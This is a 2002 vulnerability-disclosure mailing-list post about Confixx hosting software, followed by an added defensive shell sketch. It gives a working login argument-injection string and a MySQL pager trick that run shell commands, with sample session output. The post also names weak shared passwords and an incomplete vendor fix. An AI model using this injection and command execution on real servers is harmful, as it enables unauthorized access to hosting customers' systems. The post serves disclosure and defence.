Vulnerability Development mailing list archives

confixx (remote access)


From: Ralf Dreibrodt <rd () mesos de>
Date: Thu, 25 Jul 2002 13:58:56 +0200

hi,

Information about Confixx (from http://www.confixx.de):
======================================================

Confixx is a comfortable tool to automate customer administration on
Linux-based webservers with graphic interfaces for Admin, Resellers and
End Users. Currently there are more than 4200 Confixx licenses
registered. More than 150 new licenses are added each week.

The problem:
===========

you can execute commands on a lot of confixx-boxes nearly without any
account.
you need to know:
- a web hosting provider running confixx
- the password of the mysqlshell-user
- access to _any_ mysql-server

the password of the mysqlshell-user is the same for all customers.
normally you can't do anything with this account, if you don't have
access to one specific mysql-server.

i even found one big german provider, which uses 123456 as password on
all his servers for the mysqlshell-account.

you have to add a user with the name "-e" on your mysql-server with the
password PASSWORD and read access to the table TABLE.

now you can do the following:

---------------
debian:/root# ssh -l mysqlshell SERVERNAME
mysqlshell@SERVERNAME's password: <-- enter here the password from the
mysqlshell-user

Confixx-MySQL-Login
Bitte Usernamen eingeben:
---------------

here you have to enter the following string:
 -e -h IP_OF_YOUR_MYSQL_SERVER TABLE --pager=\\nweb1

after that you get prompted for a password, enter your PASSWORD (from
the user "-e" on your mysql-server) here.

---------------
web1
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1951 to server version: 3.23.49-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> \P id;
PAGER set to id;
mysql> show tables;
uid=2030(mysqlshell) gid=105(costumer) groups=105(costumer)
...
mysql> \P ls /;
PAGER set to ls /;
mysql> show tables;
bin dev home initrd lost+found mnt proc sbin usr www
boot etc formmail index.html lib mail opt root tmp var
...
---------------

Vendor:
======

a customer, who uses confixx, informed the vendor about 20 months(!)
ago.
confixx just added the following line: export EDITOR="/bin/false";
so you can't use "edit;" at the mysql-prompt anymore and can't get an
interactive shell via vi.

but you still can login without access to the mysql-server on the
attacked server and you can still execute commands on this server.

Solution:
========

Delete the mysqlshell-user

This is the second problem i found in confixx without searching for
problems...
When i have some spare time or i get paid for it, i will search for
further bugs, i am sure, there are more.

Thanks,
Ralf
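
Added example (not part of the original post and not Confixx code): a sketch of a login wrapper that keeps the typed username from being parsed as mysql client options. It assumes the flaw is unquoted expansion of the name (as in `mysql -u $name -p`); the `web<digits>` name format, `DB_HOST` and all function names are hypothetical.

```shell
#!/bin/sh
# Added example, not Confixx code. Assumption: the wrapper runs something like
#   mysql -u $name -p        (name expanded unquoted)
# so the first typed word ("-e") becomes the user name and the remaining
# words are parsed as client options.

DB_HOST="localhost"   # constructed value: the provider's own MySQL server

# Number of argv words the client would see for a given expansion.
count_args() { echo "$#"; }
argc_unquoted() { count_args -u $1 -p; }         # presumed flaw: word splitting
argc_hardened() { count_args "--user=$1" -p; }   # name stays glued to its option

# Allow only names of the form web<digits> (assumed account-name format).
valid_username() {
    case "$1" in
        web*) digits=${1#web} ;;
        *)    return 1 ;;
    esac
    case "$digits" in
        ''|*[!0-9]*) return 1 ;;   # empty, or anything that is not a digit
    esac
    return 0
}

# Print the argv for the client, one word per line, or fail closed.
client_argv() {
    valid_username "$1" || { echo "invalid username" >&2; return 1; }
    printf '%s\n' mysql "--host=$DB_HOST" "--user=$1" -p
}

# Login entry point: read one line, validate it, then exec with a fixed argv.
login() {
    printf 'Username: '
    IFS= read -r name || return 1
    valid_username "$name" || { echo "invalid username" >&2; return 1; }
    exec mysql "--host=$DB_HOST" "--user=$name" -p
}
```

This closes only the username prompt. A customer who can authenticate to the provider's own server still reaches `\P` as shown in the session above, which is why the post's solution is to delete the account.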

